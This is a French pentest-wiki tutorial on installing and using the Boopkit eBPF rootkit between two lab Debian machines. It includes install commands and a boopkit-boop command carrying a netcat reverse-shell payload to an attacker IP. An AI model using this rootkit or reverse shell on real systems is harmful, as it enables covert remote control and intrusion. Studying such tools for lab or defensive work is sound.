[Linux] Boopkit

Introduction

Boopkit est un rootkit open source qui exploite eBPF pour envoyer des payloads. Le gros avantage c'est qu'il ne va pas ouvrir de socket réseau pour fonctionner : il va se placer niveau kernel et intercepter tous les paquets réseaux qui passent par la carte réseau et chercher un boop packet à l'intérieur et dans ce cas, il se déclenche et exécute le payload reçu. Un attaquant peut donc envoyer des commandes à la victime sans qu'aucun socket réseau ne soit utilisé au niveau système.

Ressources

Article de Synaktiv sur les backdoors ePBF : https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf

Installation

Pour l'installation, on utilisera deux machines Debian 13 avec un noyau downgrade en version 5.10 (voir doc diamorphine) avec tous les outils de compilation.

Victime

On installe tous les paquets nécessaire à eBPF :

apt install -y bpftool libbpf-dev clang llvm libelf-dev gcc-multilib libxdp-dev libpcap-dev

Puis on installe boopkit :

wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz && tar -xzf v1.3.0.tar.gz && cd boopkit-1.3.0/boop && make && cd .. && make install

On lance Boopkit en mode reverse sur l'interface qui doit rester en écoute :

boopkit -i enp1s0 -r

Attaquant

On installe tous les paquets nécessaire à eBPF :

apt install -y bpftool libbpf-dev clang llvm libelf-dev gcc-multilib libxdp-dev libpcap-dev

Puis on installe boopkit :

wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz && tar -xzf v1.2.0.tar.gz && cd boopkit-1.2.0/boop && make && cd .. && make install

On utilise Boopkit pour envoyer un paquet magique à la victime (lancer un listener netcat en parallèle) :

boopkit-boop -lhost 192.168.122.209 -lport 4444 -rhost 192.168.122.188 -rport 22 -c "busybox nc 192.168.122.209 4444 -e /bin/sh"

L'IP de l'attaquant est 192.168.122.209 et l'IP de la victime 192.168.122.188 dans ce cas.

[Exploitation/AD] Cheat-sheet

[Exploitation/AD] Kerberos

[Exploitation/AD] Initial Access

[Exploitation/AD] Password spraying et brute force

[Exploitation/AD] Credentials Harvesting

[Exploitation/AD] Exécution de commande à distance

[Exploitation/Windows] Récupération base SAM locale

[Exploitation/Windows] Reset mot de passe admin local

[Exploitation/Windows] Ouvrir un shell NT authorité système

[Exploitation/Windows] Connexion RDP

[Exploitation/Windows] Eternal Blue

[Exploitation/Windows] Antivirus/EDR Evasion

[Exploitation/Windows] Keylogger

[Exploitation/Windows] Living Off the Land

[Exploitation/Windows] Monitoring evasion

[Exploitation/Wifi] Drivers AWUS1900

[Exploitation/WiFi] Aircrack-ng

[Exploitation/Wifi] Wifite

[Exploitation/Wifi] HackrfOne

[Exploitation/Réseau] Metasploit

[Exploitation/Réseau] Exploit-DB & Searchsploit

[Exploitation/Réseau] Netcat

[Exploitation/Réseau] Pwncat

[Exploitation/Réseau] ICMP Reverse shell

[Exploitation/Réseau] Data exfiltration

[Exploitation/Réseau] IDS/IPS Evasion

[Exploitation/Réseau] Reverse shell

[Exploitation/Réseau] Sliver C2

[Exploitation/Réseau] Transfert de fichiers

[Exploitation/Web] BurpSuite

[Exploitation/Web] XSS

[Exploitation/Web] SQL injection

[Exploitation/Web] CSRF

[Exploitation/Web] File upload

[Exploitation/Web] LFI / RFI

[Exploitation/Web] Bypass 403

[Exploitation/Web] IP spoofing

[Exploitation/Web] CI/CD

[Exploitation/Web] Encodage

[Exploitation/Web] JWT

[Exploitation/Web] SSRF

[Exploitation/Web] SSTI

[Exploitation/Web] XSLT

[Exploitation/Web] Déserialisation

[Exploitation/Cracking] Mots de passe

[Exploitation/Cracking] Hash

[Cracking] Wordlists

[Exploitation/Cracking] Rainbow Tables

[Exploitation/Cracking] Wifi

[Exploitation/Stegano] StegHide

[Exploitation/Stegano] Stegseek

[Exploitation/Stegano] Strings

[Exploitation/Stegano] Exiftool

[Exploitation/Stegano] Aperi'Solve

[Exploitation/Stegano] PixRecovery & GHex

[Stegano] Audio

[Exploitation/Python] Payloads

[Linux] Exécution de binaire en mode fileless

[Linux] Diamorphine

[Linux] Boopkit

[Linux] Boopkit

Introduction

Ressources

Installation

Victime

Attaquant

No Comments